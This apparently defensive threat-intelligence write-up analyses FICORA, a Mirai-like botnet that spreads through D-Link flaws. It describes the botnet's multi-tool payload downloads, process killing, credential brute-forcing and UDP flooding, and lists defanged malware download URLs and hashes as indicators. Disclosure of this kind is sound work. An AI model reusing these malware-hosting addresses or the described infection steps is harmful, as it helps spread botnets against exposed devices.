Botnet continue to exploit vulnerabilities and FICORA botnet analysis

 

Summary

 

Back to December 26, 2024, FortiGuard Labs noticed a new variant called "FICORA" frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands like downloading malware, brute force attacks, and DDoS flooding attacks on victim hosts.

 

Analysis

 

Why call the botnet named “FICORA”?

FICORA bot named from malware inside strings

Figure1- special strings

 

The shell script executes multiple strategies, such as wget, ftpget, tftp, and curl, to get malware FICORA.

Figure2-downloader with multiple strategies for get malware

 

 

The shell script kills all processes with the same file extension.

Figure3-downloader with kill -9 command

 

The shell script tries to find and kill any process containing the keyword “dvrHelper,” which can decode from hex to strings; below is a small part.

Figure4- malware inside hexadecimal script

Figure5- malware inside script with plain text

 

Yeah, as you know, like “Mirai” family Botnet loader binary bin file that contains the keyword “dvrHelper” as follows.

Figure6-loader bin like dlr.arm7

 

Brute force attacking in “FICORA” with embedded username and password list.

Figure7-  Brute force attack function with embedded username and password

 

 

And default username and password embedded in malware, FICORA and Mirai are very similay.

 

Figure8-username and password compare

 

FICORA and Mirai have multiple similary structure.

 

Figure8-structure compare

Figure9-structure compare

 

 

Compare the malware “FICORA” to Mirai, It can be identified by its similar architecture like “attack_method_udpplain”, the similarity is 53% and the confidence is 64%.

Figure10-DDoS in udp

 

IOCs

 

downloader md5 cb9f5c8892bffc28f6c12f11d60f5c92

downloader URL

hxxp://103[.]149[.]87[.]69/multi
hxxp://103[.]149[.]87[.]69/la.bot.arc
hxxp://103[.]149[.]87[.]69/la.bot.arm
hxxp://103[.]149[.]87[.]69/la.bot.arm5
hxxp://103[.]149[.]87[.]69/la.bot.arm6
hxxp://103[.]149[.]87[.]69/la.bot.arm7
hxxp://103[.]149[.]87[.]69/la.bot.m68k
hxxp://103[.]149[.]87[.]69/la.bot.mips
hxxp://103[.]149[.]87[.]69/la.bot.mipsel
hxxp://103[.]149[.]87[.]69/la.bot.powerpc
hxxp://103[.]149[.]87[.]69/la.bot.sh4
hxxp://103[.]149[.]87[.]69/la.bot.sparc

 

FICORA md5 233A1A71307FD7CA5946D90D6977E97A

 

Conclusion

It is very high confident that the malware “FICORA” can be belong to a variant of the Mirai family malware. It can be identified by its multiple similar architecture.

 

End.